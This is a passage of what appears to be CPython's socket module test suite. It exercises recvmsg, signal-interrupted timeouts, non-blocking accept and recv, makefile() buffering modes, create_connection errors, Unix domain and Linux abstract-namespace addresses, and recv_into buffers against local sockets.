@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
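# The handler deliberately raises ZeroDivisionError (via 1 / 0) instead of
# returning: since PEP 475 a system call interrupted by a signal whose
# handler returns normally is retried transparently, so raising from the
# handler is the only reliable way for these tests to observe the
# interruption.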
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises ZeroDivisionError
# (propagated from the SIGALRM handler) when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# ZeroDivisionError (propagated from the SIGALRM handler) when
# interrupted by a signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Pass an actual address here because Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires the address to be ignored anyway, since the socket
# is connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
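# With bufsize == 0, makefile() returns a raw SocketIO object, so every
# read() goes straight to the socket and no bytes are held back in a
# Python-level buffer; that is what makes the "read a line, create a new
# file object, read the next line" pattern below safe.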
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished;
# otherwise the system recv() would return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# [(2, 2, 0, '', ('127.0.0.1', 41230)),
#  (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully connect to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
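# In the Linux abstract namespace an address is marked by a leading NUL
# byte; it lives in kernel memory rather than on the filesystem, so there
# is nothing to unlink afterwards and the name may contain arbitrary
# bytes (including further NULs), as the addresses below do.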
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
